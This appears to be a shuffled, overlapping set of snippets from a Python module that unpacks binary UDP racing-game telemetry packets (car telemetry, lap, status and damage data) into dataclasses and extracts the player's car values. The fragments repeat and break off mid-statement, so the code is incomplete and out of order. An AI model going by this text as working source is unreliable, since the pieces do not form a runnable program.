CarTelemetryData class. \"\"\"", "telemetry_values(list): List of telemetry values that should be mapped to attributes. attribute_name(str): Attribute", "Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) #", "ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked:", "m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature:", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\")", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return", "\"\".join(message_format * 22), binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header))", "struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8", "player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32", "in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return", "Map brake damage values from list to attributes player_car_damage_message = ( player_car_damage_message |", "player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes player_car_damage_message = (", "that should be mapped to attributes. attribute_name(str): Attribute name used as keys in", "unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData]", ":] # Get lap data for each active car data_list = list() for", "str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message", ") player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to attributes player_telemetry_message", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values", "form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation", "unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8", "= ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from list", "(list): Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls(", "data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict from typing import", "unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod", "unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]),", "( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear:", "unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19],", "CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def", "to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\")", "struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float", "damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"],", ") player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes player_car_damage_message =", "values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\",", "+ \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader", "import ctypes from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT =", "representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT", "binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data", "m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def", "extract player data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict from", "LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name:", "player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod", "format and extract player data.\"\"\" import struct import ctypes from dataclasses import dataclass,", "def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry", "player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre", "binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form binary UDP package.", "@classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ):", "wear values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"],", "car data_list = list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\")", ") return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage:", "m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get", "import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\"", "form binary UDP package. Args: binary_message (str): Binary representation of package header. \"\"\"", "struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list)", "message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format) ] )", "@dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from", "\"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value", "UDP package. Args: binary_message (str): Binary representation of package header. \"\"\" format_string =", "Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5],", "m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "_telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData", "i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i +", "unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18],", "Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message,", "\"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name)", "\"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod", "attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) ) player_car_damage_message.pop(\"m_brakesDamage\") return", "m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK:", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" #", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = (", "unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to", "@dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8", "player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS:", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list =", "cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\"", "+ \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct", "+ \"\".join(message_format * 22), binary_message, ) # Remove header from struct unpacked_wo_header =", "m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes):", "as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict =", "self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData:", "unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class", "class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8],", "m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "+ PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) :", "= \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4],", "unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data)", "m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "\"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS:", "_telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from", "car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", "\"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name =", "Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0],", "unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6],", "player data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict from typing", "m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package.", "ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy()", "construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6],", "list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) :", "CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8", "CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19],", ") return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "\"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes", "class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map", "package. Args: binary_message (str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\"", "# Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap", "ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27],", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() )", "binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] #", "ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16", "struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "\"\"\"Struct classes for car telemetry. Classes parse data from binary format and extract", "\"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes", "to position on car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry", "= struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove", "representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return", "self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float", "used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict", "telemetry for each active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data", "class form binary UDP package. Args: binary_message (str): Binary representation of package header.", "\"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "\"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list", "CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] )", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = (", "\"\"\"Create class form binary UDP package. Args: binary_message (str): Binary representation of package", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__", "1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1],", "car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to attributes", "unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass", ") ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes player_car_damage_message", "unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header:", "* len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed:", "self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData:", "Args: telemetry_values(list): List of telemetry values that should be mapped to attributes. attribute_name(str):", "i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i +", "player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes player_car_damage_message = (", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class", "representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return", "player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list", ": (i + 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class", "struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8", "active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[", "m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class", "m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index:", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map", "_telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list", "ctypes from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\"", "Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message)", "List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "# Map brake temperature values from list to attributes player_telemetry_message = ( player_telemetry_message", "\"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21],", "ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8", "unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28],", "self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values", "cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data", "attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list and allocate to", "PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT", "from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__", "struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1],", "unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) #", "list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) )", "_telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list", "data for each active car data_list = list() for i in range(22): data", ") return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader", "struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for", "cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict:", "struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "= list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT)", "m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm:", "unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass", "\"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes", "unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData", "return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16", "ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) )", "= str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class", "player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to attributes player_telemetry_message =", "class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message,", "CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], 